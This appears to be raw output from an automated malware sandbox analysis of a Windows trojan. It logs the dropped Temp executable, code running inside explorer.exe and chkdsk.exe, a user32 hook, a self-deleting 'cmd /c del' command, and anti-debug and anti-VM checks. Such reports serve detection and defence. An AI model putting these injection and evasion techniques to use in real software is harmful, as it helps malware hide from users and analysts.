          Source: inlaww321345.exeVirustotal: Detection: 53%
          Source: inlaww321345.exeReversingLabs: Detection: 56%
          Source: C:\Users\user\Desktop\inlaww321345.exeFile read: C:\Users\user\Desktop\inlaww321345.exe
          Source: inlaww321345.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\inlaww321345.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\inlaww321345.exe "C:\Users\user\Desktop\inlaww321345.exe"
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\inlaww321345.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Users\user\Desktop\inlaww321345.exeFile created: C:\Users\user\AppData\Local\Temp\nsuD94A.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/2
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\inlaww321345.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404ABB
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCommand line argument: ^F;1_2_003B45B0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCommand line argument: ^F;2_2_003B45B0
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: inlaww321345.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\nwmcc\xasivn\insq\a82874181cac4c8c8d839f9e6026f5f4\nkrdof\moxadzwk\Release\moxadzwk.pdb source: inlaww321345.exe, 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp, idczzzzbpy.exe, 00000001.00000000.239867122.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000002.00000000.244915451.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, chkdsk.exe, 00000010.00000002.507707421.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.509886446.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, nsuD94B.tmp.0.dr, idczzzzbpy.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: idczzzzbpy.exe, 00000001.00000003.245625219.000000001A210000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000001.00000003.242881004.000000001A080000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: idczzzzbpy.exe, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B2445 push ecx; ret 1_2_003B2458
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B2445 push ecx; ret 2_2_003B2458
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_004168D5 push ebp; ret 2_2_004168D8
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041E9A8 push dword ptr [25B3BB99h]; ret 2_2_0041E9CB
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00416CD3 push esi; ret 2_2_00416CDB
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00417CF5 pushfd ; iretd 2_2_00417CF6
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D56C push eax; ret 2_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D502 push eax; ret 2_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D50B push eax; ret 2_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016BD0D1 push ecx; ret 2_2_016BD0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0540D0D1 push ecx; ret 16_2_0540D0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_009868D5 push ebp; ret 16_2_009868D8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098E9A8 push dword ptr [25B3BB99h]; ret 16_2_0098E9CB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D4B5 push eax; ret 16_2_0098D508
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00986CD3 push esi; ret 16_2_00986CDB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00987CF5 pushfd ; iretd 16_2_00987CF6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D50B push eax; ret 16_2_0098D572
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D502 push eax; ret 16_2_0098D508
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D56C push eax; ret 16_2_0098D572
          Source: C:\Users\user\Desktop\inlaww321345.exeFile created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B1890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_003B1890
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000979904 second address: 000000000097990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000979B7E second address: 0000000000979B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 4232Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-6486
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeAPI coverage: 4.1 %
          Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 9.0 %
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\inlaww321345.exeAPI call chain: ExitProcess graph end nodegraph_0-3509
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeAPI call chain: ExitProcess graph end nodegraph_1-6488
          Source: explorer.exe, 00000005.00000000.305108660.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: explorer.exe, 00000005.00000000.295963251.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000005.00000000.306086683.0000000008400000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.296016880.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.301612924.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.279924875.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000005.00000000.305220626.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 00000005.00000000.305108660.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B7A95 IsDebuggerPresent,1_2_003B7A95
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_003B558A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B86ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_003B86ED
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C962 mov eax, dword ptr fs:[00000030h]2_2_0166C962
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B171 mov eax, dword ptr fs:[00000030h]2_2_0166B171
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B944 mov eax, dword ptr fs:[00000030h]2_2_0168B944
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]2_2_01684120
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov ecx, dword ptr fs:[00000030h]2_2_01684120
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169513A mov eax, dword ptr fs:[00000030h]2_2_0169513A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669100 mov eax, dword ptr fs:[00000030h]2_2_01669100
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016F41E8 mov eax, dword ptr fs:[00000030h]2_2_016F41E8
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B1E1 mov eax, dword ptr fs:[00000030h]2_2_0166B1E1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E69A6 mov eax, dword ptr fs:[00000030h]2_2_016E69A6
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016961A0 mov eax, dword ptr fs:[00000030h]2_2_016961A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]2_2_016E51BE
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]2_2_017249A4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168C182 mov eax, dword ptr fs:[00000030h]2_2_0168C182
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A185 mov eax, dword ptr fs:[00000030h]2_2_0169A185
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692990 mov eax, dword ptr fs:[00000030h]2_2_01692990
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722073 mov eax, dword ptr fs:[00000030h]2_2_01722073
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01731074 mov eax, dword ptr fs:[00000030h]2_2_01731074
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01680050 mov eax, dword ptr fs:[00000030h]2_2_01680050
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01680050 mov eax, dword ptr fs:[00000030h]2_2_01680050
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]2_2_0169002D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]2_2_0169002D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]2_2_0169002D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]2_2_0169002D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]2_2_0169002D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]2_2_0167B02A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]2_2_0167B02A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]2_2_0167B02A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]2_2_0167B02A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]2_2_0168A830
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]2_2_0168A830
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]2_2_0168A830
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]2_2_0168A830
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01734015 mov eax, dword ptr fs:[00000030h]2_2_01734015
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01734015 mov eax, dword ptr fs:[00000030h]2_2_01734015
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]2_2_016E7016
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]2_2_016E7016
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]2_2_016E7016
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]2_2_016640E1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]2_2_016640E1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]2_2_016640E1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016658EC mov eax, dword ptr fs:[00000030h]2_2_016658EC
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B8E4 mov eax, dword ptr fs:[00000030h]2_2_0168B8E4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B8E4 mov eax, dword ptr fs:[00000030h]2_2_0168B8E4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov ecx, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]2_2_016FB8D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A90AF mov eax, dword ptr fs:[00000030h]2_2_016A90AF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169F0BF mov ecx, dword ptr fs:[00000030h]2_2_0169F0BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169F0BF mov eax, dword ptr fs:[00000030h]2_2_0169F0BF
